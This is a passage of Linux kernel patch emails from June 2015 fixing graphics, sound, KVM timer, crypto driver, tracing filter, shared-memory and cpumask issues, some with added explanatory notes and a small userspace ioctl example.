From 245ec9d85696c3e539b23e210f248698b478379c Mon Sep 17 00:00:00 2001 From: Jani Nikula Date: Mon, 15 Jun 2015 12:59:37 +0300 Subject: [PATCH 852/872] Revert "drm/i915: Don't skip request retirement if the active list is empty" MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit This reverts commit 0aedb1626566efd72b369c01992ee7413c82a0c5. I messed things up while applying [1] to drm-intel-fixes. Rectify. [1] http://mid.gmane.org/1432827156-9605-1-git-send-email-ville.syrjala@linux.intel.com Fixes: 0aedb1626566 ("drm/i915: Don't skip request retirement if the active list is empty") Cc: stable@vger.kernel.org Acked-by: Ville Syrjälä Signed-off-by: Jani Nikula --- drivers/gpu/drm/i915/i915_gem.c | 3 +++ 1 file changed, 3 insertions(+) diff --git a/drivers/gpu/drm/i915/i915_gem.c b/drivers/gpu/drm/i915/i915_gem.c index c3806c66650a..2d0995e7afc3 100644 --- a/drivers/gpu/drm/i915/i915_gem.c +++ b/drivers/gpu/drm/i915/i915_gem.c @@ -2656,6 +2656,9 @@ void i915_gem_reset(struct drm_device *dev) void i915_gem_retire_requests_ring(struct intel_engine_cs *ring) { + if (list_empty(&ring->request_list)) + return; + WARN_ON(i915_verify_lists(ring->dev)); /* Retire requests first as we use it above for the early return. From 82d6d8a4034a7480d582791763c89c328c2a8f0c Mon Sep 17 00:00:00 2001 From: Takashi Iwai Date: Mon, 15 Jun 2015 20:36:12 +0200 Subject: [PATCH 853/872] ALSA: hda - Fix noisy outputs on Dell XPS13 (2015 model) The new Dell XPS13 also requires the similar quirk for fixing the noisy outputs. (But, as the codec was changed, now the fixup for Latitude is used instead.) Bugzilla: https://bugzilla.kernel.org/show_bug.cgi?id=99851 Signed-off-by: Takashi Iwai --- sound/pci/hda/patch_realtek.c | 1 + 1 file changed, 1 insertion(+) diff --git a/sound/pci/hda/patch_realtek.c b/sound/pci/hda/patch_realtek.c index 919051d92a0b..6d010452c1f5 100644 --- a/sound/pci/hda/patch_realtek.c +++ b/sound/pci/hda/patch_realtek.c @@ -5072,6 +5072,7 @@ static const struct snd_pci_quirk alc269_fixup_tbl[] = { SND_PCI_QUIRK(0x1028, 0x0638, "Dell Inspiron 5439", ALC290_FIXUP_MONO_SPEAKERS_HSJACK), SND_PCI_QUIRK(0x1028, 0x064a, "Dell", ALC293_FIXUP_DELL1_MIC_NO_PRESENCE), SND_PCI_QUIRK(0x1028, 0x064b, "Dell", ALC293_FIXUP_DELL1_MIC_NO_PRESENCE), + SND_PCI_QUIRK(0x1028, 0x0665, "Dell XPS 13", ALC292_FIXUP_DELL_E7X), SND_PCI_QUIRK(0x1028, 0x06c7, "Dell", ALC255_FIXUP_DELL1_MIC_NO_PRESENCE), SND_PCI_QUIRK(0x1028, 0x06d9, "Dell", ALC293_FIXUP_DELL1_MIC_NO_PRESENCE), SND_PCI_QUIRK(0x1028, 0x06da, "Dell", ALC293_FIXUP_DELL1_MIC_NO_PRESENCE), From 25161084b1c1b0c29948f6f77266a35f302196b7 Mon Sep 17 00:00:00 2001 From: Adam Jackson Date: Mon, 15 Jun 2015 16:16:15 -0400 Subject: [PATCH 854/872] drm/mgag200: Reject non-character-cell-aligned mode widths Turns out 1366x768 does not in fact work on this hardware. 
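Concretely, the new check requires every horizontal timing value to be a multiple of 8 pixels (one character cell on this hardware): 1366 = 8 * 170 + 6, so any 1366-wide mode is now rejected with MODE_H_ILLEGAL, while widths such as 1360 or 1368 pass this particular test, provided the rest of their horizontal timings are also 8-aligned and the mode clears the existing bandwidth and 2048/4096 limits.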
Signed-off-by: Adam Jackson Cc: stable@vger.kernel.org Signed-off-by: Dave Airlie --- drivers/gpu/drm/mgag200/mgag200_mode.c | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/drivers/gpu/drm/mgag200/mgag200_mode.c b/drivers/gpu/drm/mgag200/mgag200_mode.c index 6e84df9369a6..ad4b9010dfb0 100644 --- a/drivers/gpu/drm/mgag200/mgag200_mode.c +++ b/drivers/gpu/drm/mgag200/mgag200_mode.c @@ -1526,6 +1526,11 @@ static int mga_vga_mode_valid(struct drm_connector *connector, return MODE_BANDWIDTH; } + if ((mode->hdisplay % 8) != 0 || (mode->hsync_start % 8) != 0 || + (mode->hsync_end % 8) != 0 || (mode->htotal % 8) != 0) { + return MODE_H_ILLEGAL; + } + if (mode->crtc_hdisplay > 2048 || mode->crtc_hsync_start > 4096 || mode->crtc_hsync_end > 4096 || mode->crtc_htotal > 4096 || mode->crtc_vdisplay > 2048 || mode->crtc_vsync_start > 4096 || From b6ac069532218027f2991cba01d7a72a200688b0 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Radim=20Kr=C4=8Dm=C3=A1=C5=99?= Date: Fri, 5 Jun 2015 20:57:41 +0200 Subject: [PATCH 855/872] KVM: x86: fix lapic.timer_mode on restore MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit lapic.timer_mode was not properly initialized after migration, which broke few useful things, like login, by making every sleep eternal. Fix this by calling apic_update_lvtt in kvm_apic_post_state_restore. There are other slowpaths that update lvtt, so this patch makes sure something similar doesn't happen again by calling apic_update_lvtt after every modification. Cc: stable@vger.kernel.org Fixes: f30ebc312ca9 ("KVM: x86: optimize some accesses to LVTT and SPIV") Signed-off-by: Radim Krčmář Signed-off-by: Marcelo Tosatti --- arch/x86/kvm/lapic.c | 26 ++++++++++++++++---------- 1 file changed, 16 insertions(+), 10 deletions(-) diff --git a/arch/x86/kvm/lapic.c b/arch/x86/kvm/lapic.c index 629af0f1c5c4..4c7deb4f78a1 100644 --- a/arch/x86/kvm/lapic.c +++ b/arch/x86/kvm/lapic.c @@ -1090,6 +1090,17 @@ static void update_divide_count(struct kvm_lapic *apic) apic->divide_count); } +static void apic_update_lvtt(struct kvm_lapic *apic) +{ + u32 timer_mode = kvm_apic_get_reg(apic, APIC_LVTT) & + apic->lapic_timer.timer_mode_mask; + + if (apic->lapic_timer.timer_mode != timer_mode) { + apic->lapic_timer.timer_mode = timer_mode; + hrtimer_cancel(&apic->lapic_timer.timer); + } +} + static void apic_timer_expired(struct kvm_lapic *apic) { struct kvm_vcpu *vcpu = apic->vcpu; @@ -1298,6 +1309,7 @@ static int apic_reg_write(struct kvm_lapic *apic, u32 reg, u32 val) apic_set_reg(apic, APIC_LVTT + 0x10 * i, lvt_val | APIC_LVT_MASKED); } + apic_update_lvtt(apic); atomic_set(&apic->lapic_timer.pending, 0); } @@ -1330,20 +1342,13 @@ static int apic_reg_write(struct kvm_lapic *apic, u32 reg, u32 val) break; - case APIC_LVTT: { - u32 timer_mode = val & apic->lapic_timer.timer_mode_mask; - - if (apic->lapic_timer.timer_mode != timer_mode) { - apic->lapic_timer.timer_mode = timer_mode; - hrtimer_cancel(&apic->lapic_timer.timer); - } - + case APIC_LVTT: if (!kvm_apic_sw_enabled(apic)) val |= APIC_LVT_MASKED; val &= (apic_lvt_mask[0] | apic->lapic_timer.timer_mode_mask); apic_set_reg(apic, APIC_LVTT, val); + apic_update_lvtt(apic); break; - } case APIC_TMICT: if (apic_lvtt_tscdeadline(apic)) @@ -1576,7 +1581,7 @@ void kvm_lapic_reset(struct kvm_vcpu *vcpu) for (i = 0; i < APIC_LVT_NUM; i++) apic_set_reg(apic, APIC_LVTT + 0x10 * i, APIC_LVT_MASKED); - apic->lapic_timer.timer_mode = 0; + apic_update_lvtt(apic); apic_set_reg(apic, APIC_LVT0, SET_APIC_DELIVERY_MODE(0, 
APIC_MODE_EXTINT)); @@ -1802,6 +1807,7 @@ void kvm_apic_post_state_restore(struct kvm_vcpu *vcpu, apic_update_ppr(apic); hrtimer_cancel(&apic->lapic_timer.timer); + apic_update_lvtt(apic); update_divide_count(apic); start_apic_timer(apic); apic->irr_pending = true; From 6fd4b15603124c1b56e03db29b41ec39d8a077b9 Mon Sep 17 00:00:00 2001 From: Steve Cornelius Date: Mon, 15 Jun 2015 16:52:56 -0700 Subject: [PATCH 856/872] crypto: caam - improve initalization for context state saves Multiple function in asynchronous hashing use a saved-state block, a.k.a. struct caam_hash_state, which holds a stash of information between requests (init/update/final). Certain values in this state block are loaded for processing using an inline-if, and when this is done, the potential for uninitialized data can pose conflicts. Therefore, this patch improves initialization of state data to prevent false assignments using uninitialized data in the state block. This patch addresses the following traceback, originating in ahash_final_ctx(), although a problem like this could certainly exhibit other symptoms: kernel BUG at arch/arm/mm/dma-mapping.c:465! Unable to handle kernel NULL pointer dereference at virtual address 00000000 pgd = 80004000 [00000000] *pgd=00000000 Internal error: Oops: 805 [#1] PREEMPT SMP Modules linked in: CPU: 0 Not tainted (3.0.15-01752-gdd441b9-dirty #40) PC is at __bug+0x1c/0x28 LR is at __bug+0x18/0x28 pc : [<80043240>] lr : [<8004323c>] psr: 60000013 sp : e423fd98 ip : 60000013 fp : 0000001c r10: e4191b84 r9 : 00000020 r8 : 00000009 r7 : 88005038 r6 : 00000001 r5 : 2d676572 r4 : e4191a60 r3 : 00000000 r2 : 00000001 r1 : 60000093 r0 : 00000033 Flags: nZCv IRQs on FIQs on Mode SVC_32 ISA ARM Segment kernel Control: 10c53c7d Table: 1000404a DAC: 00000015 Process cryptomgr_test (pid: 1306, stack limit = 0xe423e2f0) Stack: (0xe423fd98 to 0xe4240000) fd80: 11807fd1 80048544 fda0: 88005000 e4191a00 e5178040 8039dda0 00000000 00000014 2d676572 e4191008 fdc0: 88005018 e4191a60 00100100 e4191a00 00000000 8039ce0c e423fea8 00000007 fde0: e4191a00 e4227000 e5178000 8039ce18 e419183c 80203808 80a94a44 00000006 fe00: 00000000 80207180 00000000 00000006 e423ff08 00000000 00000007 e5178000 fe20: e41918a4 80a949b4 8c4844e2 00000000 00000049 74227000 8c4844e2 00000e90 fe40: 0000000e 74227e90 ffff8c58 80ac29e0 e423fed4 8006a350 8c81625c e423ff5c fe60: 00008576 e4002500 00000003 00030010 e4002500 00000003 e5180000 e4002500 fe80: e5178000 800e6d24 007fffff 00000000 00000010 e4001280 e4002500 60000013 fea0: 000000d0 804df078 00000000 00000000 00000000 00000000 00000000 00000000 fec0: 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000 fee0: 00000000 00000000 e4227000 e4226000 e4753000 e4752000 e40a5000 e40a4000 ff00: e41e7000 e41e6000 00000000 00000000 00000000 e423ff14 e423ff14 00000000 ff20: 00000400 804f9080 e5178000 e4db0b40 00000000 e4db0b80 0000047c 00000400 ff40: 00000000 8020758c 00000400 ffffffff 0000008a 00000000 e4db0b40 80206e00 ff60: e4049dbc 00000000 00000000 00000003 e423ffa4 80062978 e41a8bfc 00000000 ff80: 00000000 e4049db4 00000013 e4049db0 00000013 00000000 00000000 00000000 ffa0: e4db0b40 e4db0b40 80204cbc 00000013 00000000 00000000 00000000 80204cfc ffc0: e4049da0 80089544 80040a40 00000000 e4db0b40 00000000 00000000 00000000 ffe0: e423ffe0 e423ffe0 e4049da0 800894c4 80040a40 80040a40 00000000 00000000 [<80043240>] (__bug+0x1c/0x28) from [<80048544>] (___dma_single_dev_to_cpu+0x84) [<80048544>] (___dma_single_dev_to_cpu+0x84/0x94) from [<8039dda0>] (ahash_fina) 
[<8039dda0>] (ahash_final_ctx+0x180/0x428) from [<8039ce18>] (ahash_final+0xc/0) [<8039ce18>] (ahash_final+0xc/0x10) from [<80203808>] (crypto_ahash_op+0x28/0xc) [<80203808>] (crypto_ahash_op+0x28/0xc0) from [<80207180>] (test_hash+0x214/0x5) [<80207180>] (test_hash+0x214/0x5b8) from [<8020758c>] (alg_test_hash+0x68/0x8c) [<8020758c>] (alg_test_hash+0x68/0x8c) from [<80206e00>] (alg_test+0x7c/0x1b8) [<80206e00>] (alg_test+0x7c/0x1b8) from [<80204cfc>] (cryptomgr_test+0x40/0x48) [<80204cfc>] (cryptomgr_test+0x40/0x48) from [<80089544>] (kthread+0x80/0x88) [<80089544>] (kthread+0x80/0x88) from [<80040a40>] (kernel_thread_exit+0x0/0x8) Code: e59f0010 e1a01003 eb126a8d e3a03000 (e5833000) ---[ end trace d52a403a1d1eaa86 ]--- Cc: stable@vger.kernel.org Signed-off-by: Steve Cornelius Signed-off-by: Victoria Milhoan Signed-off-by: Herbert Xu --- drivers/crypto/caam/caamhash.c | 2 ++ 1 file changed, 2 insertions(+) diff --git a/drivers/crypto/caam/caamhash.c b/drivers/crypto/caam/caamhash.c index ba0532efd3ae..332c8ef8dae2 100644 --- a/drivers/crypto/caam/caamhash.c +++ b/drivers/crypto/caam/caamhash.c @@ -1544,6 +1544,8 @@ static int ahash_init(struct ahash_request *req) state->current_buf = 0; state->buf_dma = 0; + state->buflen_0 = 0; + state->buflen_1 = 0; return 0; } From 412c98c1bef65fe7589f1300e93735d96130307c Mon Sep 17 00:00:00 2001 From: Steve Cornelius Date: Mon, 15 Jun 2015 16:52:59 -0700 Subject: [PATCH 857/872] crypto: caam - fix RNG buffer cache alignment The hwrng output buffers (2) are cast inside of a a struct (caam_rng_ctx) allocated in one DMA-tagged region. While the kernel's heap allocator should place the overall struct on a cacheline aligned boundary, the 2 buffers contained within may not necessarily align. Consenquently, the ends of unaligned buffers may not fully flush, and if so, stale data will be left behind, resulting in small repeating patterns. This fix aligns the buffers inside the struct. Note that not all of the data inside caam_rng_ctx necessarily needs to be DMA-tagged, only the buffers themselves require this. However, a fix would incur the expense of error-handling bloat in the case of allocation failure. Cc: stable@vger.kernel.org Signed-off-by: Steve Cornelius Signed-off-by: Victoria Milhoan Signed-off-by: Herbert Xu --- drivers/crypto/caam/caamrng.c | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/drivers/crypto/caam/caamrng.c b/drivers/crypto/caam/caamrng.c index 26a544b505f1..5095337205b8 100644 --- a/drivers/crypto/caam/caamrng.c +++ b/drivers/crypto/caam/caamrng.c @@ -56,7 +56,7 @@ /* Buffer, its dma address and lock */ struct buf_data { - u8 buf[RN_BUF_SIZE]; + u8 buf[RN_BUF_SIZE] ____cacheline_aligned; dma_addr_t addr; struct completion filled; u32 hw_desc[DESC_JOB_O_LEN]; From 145c0e914d2cd0cf829b8c4cbe24736b3ee81a91 Mon Sep 17 00:00:00 2001 From: Takashi Iwai Date: Tue, 16 Jun 2015 12:23:36 +0200 Subject: [PATCH 858/872] ALSA: hda - Fix unused label skip_i915 MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit When CONFIG_SND_HDA_I915=n, we get a compile warning: sound/pci/hda/hda_intel.c: In function ‘azx_probe_continue’: sound/pci/hda/hda_intel.c:1882:2: warning: label ‘skip_i915’ defined but not used [-Wunused-label] Fix it by putting again ifdef to it. Sigh. 
Fixes: bf06848bdbe5 ('ALSA: hda - Continue probing even if i915 binding fails') Reported-by: Borislav Petkov Signed-off-by: Takashi Iwai --- sound/pci/hda/hda_intel.c | 2 ++ 1 file changed, 2 insertions(+) diff --git a/sound/pci/hda/hda_intel.c b/sound/pci/hda/hda_intel.c index a244ba706317..b6db25b23dd3 100644 --- a/sound/pci/hda/hda_intel.c +++ b/sound/pci/hda/hda_intel.c @@ -1879,7 +1879,9 @@ static int azx_probe_continue(struct azx *chip) #endif } +#ifdef CONFIG_SND_HDA_I915 skip_i915: +#endif err = azx_first_init(chip); if (err < 0) goto out_free; From 2cf30dc180cea808077f003c5116388183e54f9e Mon Sep 17 00:00:00 2001 From: Steven Rostedt Date: Mon, 15 Jun 2015 17:50:25 -0400 Subject: [PATCH 859/872] tracing: Have filter check for balanced ops When the following filter is used it causes a warning to trigger: # cd /sys/kernel/debug/tracing # echo "((dev==1)blocks==2)" > events/ext4/ext4_truncate_exit/filter -bash: echo: write error: Invalid argument # cat events/ext4/ext4_truncate_exit/filter ((dev==1)blocks==2) ^ parse_error: No error ------------[ cut here ]------------ WARNING: CPU: 2 PID: 1223 at kernel/trace/trace_events_filter.c:1640 replace_preds+0x3c5/0x990() Modules linked in: bnep lockd grace bluetooth ... CPU: 3 PID: 1223 Comm: bash Tainted: G W 4.1.0-rc3-test+ #450 Hardware name: Hewlett-Packard HP Compaq Pro 6300 SFF/339A, BIOS K01 v02.05 05/07/2012 0000000000000668 ffff8800c106bc98 ffffffff816ed4f9 ffff88011ead0cf0 0000000000000000 ffff8800c106bcd8 ffffffff8107fb07 ffffffff8136b46c ffff8800c7d81d48 ffff8800d4c2bc00 ffff8800d4d4f920 00000000ffffffea Call Trace: [] dump_stack+0x4c/0x6e [] warn_slowpath_common+0x97/0xe0 [] ? _kstrtoull+0x2c/0x80 [] warn_slowpath_null+0x1a/0x20 [] replace_preds+0x3c5/0x990 [] create_filter+0x82/0xb0 [] apply_event_filter+0xd4/0x180 [] event_filter_write+0x8f/0x120 [] __vfs_write+0x28/0xe0 [] ? __sb_start_write+0x53/0xf0 [] ? security_file_permission+0x30/0xc0 [] vfs_write+0xb8/0x1b0 [] SyS_write+0x4f/0xb0 [] system_call_fastpath+0x12/0x6a ---[ end trace e11028bd95818dcd ]--- Worse yet, reading the error message (the filter again) it says that there was no error, when there clearly was. The issue is that the code that checks the input does not check for balanced ops. That is, having an op between a closed parenthesis and the next token. This would only cause a warning, and fail out before doing any real harm, but it should still not caues a warning, and the error reported should work: # cd /sys/kernel/debug/tracing # echo "((dev==1)blocks==2)" > events/ext4/ext4_truncate_exit/filter -bash: echo: write error: Invalid argument # cat events/ext4/ext4_truncate_exit/filter ((dev==1)blocks==2) ^ parse_error: Meaningless filter expression And give no kernel warning. 
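The counting rule the fix adds is easiest to see on the postfix form of a filter: each operand raises a running count by one, and each comparison or logical operator ('==', '&&', '||') lowers it by one, so a well-formed expression ends with the count at exactly 1. For '(dev==1)&&(blocks==2)' the count runs 1,2,1,2,3,2,1; for the unbalanced '((dev==1)blocks==2)' there is no joining operator, the count ends at 2, and check_preds() now returns -EINVAL with the 'Meaningless filter expression' message instead of letting replace_preds() trip its WARN_ON.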
Link: http://lkml.kernel.org/r/20150615175025.7e809215@gandalf.local.home Cc: Peter Zijlstra Cc: Ingo Molnar Cc: Arnaldo Carvalho de Melo Cc: stable@vger.kernel.org # 2.6.31+ Reported-by: Vince Weaver Tested-by: Vince Weaver Signed-off-by: Steven Rostedt --- kernel/trace/trace_events_filter.c | 11 +++++++++-- 1 file changed, 9 insertions(+), 2 deletions(-) diff --git a/kernel/trace/trace_events_filter.c b/kernel/trace/trace_events_filter.c index ced69da0ff55..7f2e97ce71a7 100644 --- a/kernel/trace/trace_events_filter.c +++ b/kernel/trace/trace_events_filter.c @@ -1369,19 +1369,26 @@ static int check_preds(struct filter_parse_state *ps) { int n_normal_preds = 0, n_logical_preds = 0; struct postfix_elt *elt; + int cnt = 0; list_for_each_entry(elt, &ps->postfix, list) { - if (elt->op == OP_NONE) + if (elt->op == OP_NONE) { + cnt++; continue; + } if (elt->op == OP_AND || elt->op == OP_OR) { n_logical_preds++; + cnt--; continue; } + if (elt->op != OP_NOT) + cnt--; n_normal_preds++; + WARN_ON_ONCE(cnt < 0); } - if (!n_normal_preds || n_logical_preds >= n_normal_preds) { + if (cnt != 1 || !n_normal_preds || n_logical_preds >= n_normal_preds) { parse_error(ps, FILT_ERR_INVALID_FILTER, 0); return -EINVAL; } From 8366610283d08564f65a1af2ec8458df08418727 Mon Sep 17 00:00:00 2001 From: Wolfram Sang Date: Mon, 15 Jun 2015 19:51:46 +0200 Subject: [PATCH 860/872] i2c: slave: fix the example how to instantiate from userspace I copied the wrong shell code into the documentation. Sorry to all who tried to get sense out of this current example :/ Slight rewording while we are here. Reported-by: Tim Bakker Signed-off-by: Wolfram Sang Signed-off-by: Wolfram Sang Cc: stable@kernel.org --- Documentation/i2c/slave-interface | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/Documentation/i2c/slave-interface b/Documentation/i2c/slave-interface index 389bb5d61854..b228ca54bcf4 100644 --- a/Documentation/i2c/slave-interface +++ b/Documentation/i2c/slave-interface @@ -31,10 +31,10 @@ User manual =========== I2C slave backends behave like standard I2C clients. So, you can instantiate -them like described in the document 'instantiating-devices'. A quick example -for instantiating the slave-eeprom driver from userspace: +them as described in the document 'instantiating-devices'. A quick example for +instantiating the slave-eeprom driver from userspace at address 0x64 on bus 1: - # echo 0-0064 > /sys/bus/i2c/drivers/i2c-slave-eeprom/bind + # echo slave-24c02 0x64 > /sys/bus/i2c/devices/i2c-1/new_device Each backend should come with separate documentation to describe its specific behaviour and setup. From 66fc13039422ba7df2d01a8ee0873e4ef965b50b Mon Sep 17 00:00:00 2001 From: Hugh Dickins Date: Sun, 14 Jun 2015 09:48:09 -0700 Subject: [PATCH 861/872] mm: shmem_zero_setup skip security check and lockdep conflict with XFS It appears that, at some point last year, XFS made directory handling changes which bring it into lockdep conflict with shmem_zero_setup(): it is surprising that mmap() can clone an inode while holding mmap_sem, but that has been so for many years. Since those few lockdep traces that I've seen all implicated selinux, I'm hoping that we can use the __shmem_file_setup(,,,S_PRIVATE) which v3.13's commit c7277090927a ("security: shmem: implement kernel private shmem inodes") introduced to avoid LSM checks on kernel-internal inodes: the mmap("/dev/zero") cloned inode is indeed a kernel-internal detail. 
This also covers the !CONFIG_SHMEM use of ramfs to support /dev/zero (and MAP_SHARED|MAP_ANONYMOUS). I thought there were also drivers which cloned an inode in mmap(), but if so, I cannot locate them now. Reported-and-tested-by: Prarit Bhargava Reported-and-tested-by: Daniel Wagner Reported-and-tested-by: Morten Stevens Signed-off-by: Hugh Dickins Signed-off-by: Linus Torvalds --- mm/shmem.c | 8 +++++++- 1 file changed, 7 insertions(+), 1 deletion(-) diff --git a/mm/shmem.c b/mm/shmem.c index de981370fbc5..47d536e59fc0 100644 --- a/mm/shmem.c +++ b/mm/shmem.c @@ -3401,7 +3401,13 @@ int shmem_zero_setup(struct vm_area_struct *vma) struct file *file; loff_t size = vma->vm_end - vma->vm_start; - file = shmem_file_setup("dev/zero", size, vma->vm_flags); + /* + * Cloning a new file under mmap_sem leads to a lock ordering conflict + * between XFS directory reading and selinux: since this file is only + * accessible to the user through its mapping, use S_PRIVATE flag to + * bypass file security, in the same way as shmem_kernel_file_setup(). + */ + file = __shmem_file_setup("dev/zero", size, vma->vm_flags, S_PRIVATE); if (IS_ERR(file)) return PTR_ERR(file); From 6cea28d01ee834c4437cccab07f3086435de08a4 Mon Sep 17 00:00:00 2001 From: Mauro Carvalho Chehab Date: Tue, 16 Jun 2015 06:26:59 -0300 Subject: [PATCH 862/872] Kconfig: disable Media Controller for DVB Since we started discussing the use of the Media Controller for complex hardware, one thing has become clear: the way it is, MC fails to map anything other than capture/output/m2m video-only streaming. The point is that MC has entities named as devnodes, but the only devnode used (before the DVB patches) is MEDIA_ENT_T_DEVNODE_V4L. Due to the way MC got implemented, however, this entity actually doesn't represent the devnode, but the hardware I/O engine that receives data via DMA. By coincidence, such DMA is associated with the V4L device node on webcam hardware, but this is not true even for other V4L2 devices. For example, on USB hardware, the DMA is done via the USB controller. The data passes through an in-kernel filter that strips off the URB headers. Other V4L2 devices like radio may not even have DMA. When they do, the DMA is done via ALSA, and not via the V4L devnode. In other words, MC is broken as a whole, but tagging it as BROKEN right now would do more harm than good. So, instead, let's mark, for now, the DVB part as broken and block all new changes to MC while we fix this mess, which we hopefully will do for the next kernel version. Requested-by: Laurent Pinchart Signed-off-by: Hans Verkuil Acked-by: Laurent Pinchart Signed-off-by: Mauro Carvalho Chehab Signed-off-by: Linus Torvalds --- drivers/media/Kconfig | 1 + 1 file changed, 1 insertion(+) diff --git a/drivers/media/Kconfig b/drivers/media/Kconfig index 3ef0f90b128f..157099243d61 100644 --- a/drivers/media/Kconfig +++ b/drivers/media/Kconfig @@ -97,6 +97,7 @@ config MEDIA_CONTROLLER config MEDIA_CONTROLLER_DVB bool "Enable Media controller for DVB" depends on MEDIA_CONTROLLER + depends on BROKEN ---help--- Enable the media controller API support for DVB. From 3bc980bf19bb62007e923691fa2869ba113be895 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Michel=20D=C3=A4nzer?= Date: Tue, 16 Jun 2015 17:28:16 +0900 Subject: [PATCH 863/872] drm/radeon: Add RADEON_INFO_VA_UNMAP_WORKING query MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit This tells userspace that it's safe to use the RADEON_VA_UNMAP operation of the DRM_RADEON_GEM_VA ioctl.
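A userspace probe of the new query might look roughly like the sketch below; this is an assumption-laden illustration (header path, the /dev/dri/card0 node and the error handling are simplifications), not code from this patch. Older kernels reject the unknown request with -EINVAL, which is effectively the "not safe" answer.

#include <fcntl.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#include <sys/ioctl.h>
#include <unistd.h>
#include <drm/radeon_drm.h>   /* header location varies; may be <libdrm/radeon_drm.h> */

#ifndef RADEON_INFO_VA_UNMAP_WORKING
#define RADEON_INFO_VA_UNMAP_WORKING 0x25   /* value from this patch */
#endif

int main(void)
{
	uint32_t working = 0;
	struct drm_radeon_info info;
	int fd = open("/dev/dri/card0", O_RDWR);

	if (fd < 0) {
		perror("open");
		return 1;
	}

	memset(&info, 0, sizeof(info));
	info.request = RADEON_INFO_VA_UNMAP_WORKING;
	info.value = (uintptr_t)&working;   /* kernel writes a u32 result here */

	if (ioctl(fd, DRM_IOCTL_RADEON_INFO, &info) == 0 && working)
		printf("RADEON_VA_UNMAP is safe to use\n");
	else
		printf("fall back: avoid RADEON_VA_UNMAP\n");

	close(fd);
	return 0;
}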
Cc: stable@vger.kernel.org (NOTE: Backporting this commit requires at least backports of commits 26d4d129b6042197b4cbc8341c0618f99231af2f, 48afbd70ac7b6aa62e8d452091023941d8085f8a and c29c0876ec05d51a93508a39b90b92c29ba6423d as well, otherwise using RADEON_VA_UNMAP runs into trouble) Signed-off-by: Michel Dänzer Signed-off-by: Christian König --- drivers/gpu/drm/radeon/radeon_kms.c | 3 +++ include/uapi/drm/radeon_drm.h | 1 + 2 files changed, 4 insertions(+) diff --git a/drivers/gpu/drm/radeon/radeon_kms.c b/drivers/gpu/drm/radeon/radeon_kms.c index 7b2a7335cc5d..b0acf50d9558 100644 --- a/drivers/gpu/drm/radeon/radeon_kms.c +++ b/drivers/gpu/drm/radeon/radeon_kms.c @@ -576,6 +576,9 @@ static int radeon_info_ioctl(struct drm_device *dev, void *data, struct drm_file if (radeon_get_allowed_info_register(rdev, *value, value)) return -EINVAL; break; + case RADEON_INFO_VA_UNMAP_WORKING: + *value = true; + break; default: DRM_DEBUG_KMS("Invalid request %d\n", info->request); return -EINVAL; diff --git a/include/uapi/drm/radeon_drm.h b/include/uapi/drm/radeon_drm.h index 871e73f99a4d..94d44ab2fda1 100644 --- a/include/uapi/drm/radeon_drm.h +++ b/include/uapi/drm/radeon_drm.h @@ -1038,6 +1038,7 @@ struct drm_radeon_cs { #define RADEON_INFO_CURRENT_GPU_SCLK 0x22 #define RADEON_INFO_CURRENT_GPU_MCLK 0x23 #define RADEON_INFO_READ_REG 0x24 +#define RADEON_INFO_VA_UNMAP_WORKING 0x25 struct drm_radeon_info { uint32_t request; From 7f017e56770e82c8fe2d4d8c59e58f519f455ad7 Mon Sep 17 00:00:00 2001 From: Dave Airlie Date: Thu, 18 Jun 2015 14:29:18 +1000 Subject: [PATCH 864/872] drm/radeon: don't probe MST on hw we don't support it on MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit If you do radeon.mst=1 on a gpu without mst hw, and then plug some mst hw it will oops instead of falling back. So check we have DCE5 at least before proceeding. Signed-off-by: Dave Airlie Signed-off-by: Christian König --- drivers/gpu/drm/radeon/radeon_dp_mst.c | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/drivers/gpu/drm/radeon/radeon_dp_mst.c b/drivers/gpu/drm/radeon/radeon_dp_mst.c index 2b98ed3e684d..257b10be5cda 100644 --- a/drivers/gpu/drm/radeon/radeon_dp_mst.c +++ b/drivers/gpu/drm/radeon/radeon_dp_mst.c @@ -663,12 +663,17 @@ int radeon_dp_mst_probe(struct radeon_connector *radeon_connector) { struct radeon_connector_atom_dig *dig_connector = radeon_connector->con_priv; + struct drm_device *dev = radeon_connector->base.dev; + struct radeon_device *rdev = dev->dev_private; int ret; u8 msg[1]; if (!radeon_mst) return 0; + if (!ASIC_IS_DCE5(rdev)) + return 0; + if (dig_connector->dpcd[DP_DPCD_REV] < 0x12) return 0; From 5ca62d65030d8295f54c490d2072563545dbd9d9 Mon Sep 17 00:00:00 2001 From: Andrew Morton Date: Thu, 18 Jun 2015 11:01:11 -0700 Subject: [PATCH 865/872] revert "cpumask: don't perform while loop in cpumask_next_and()" Revert commit 534b483a86e6 ("cpumask: don't perform while loop in cpumask_next_and()"). This was a minor optimization, but it puts a `struct cpumask' on the stack, which consumes too much stack space. Sergey Senozhatsky Reported-by: Peter Zijlstra Cc: Sergey Senozhatsky Cc: Tejun Heo Cc: "David S. 
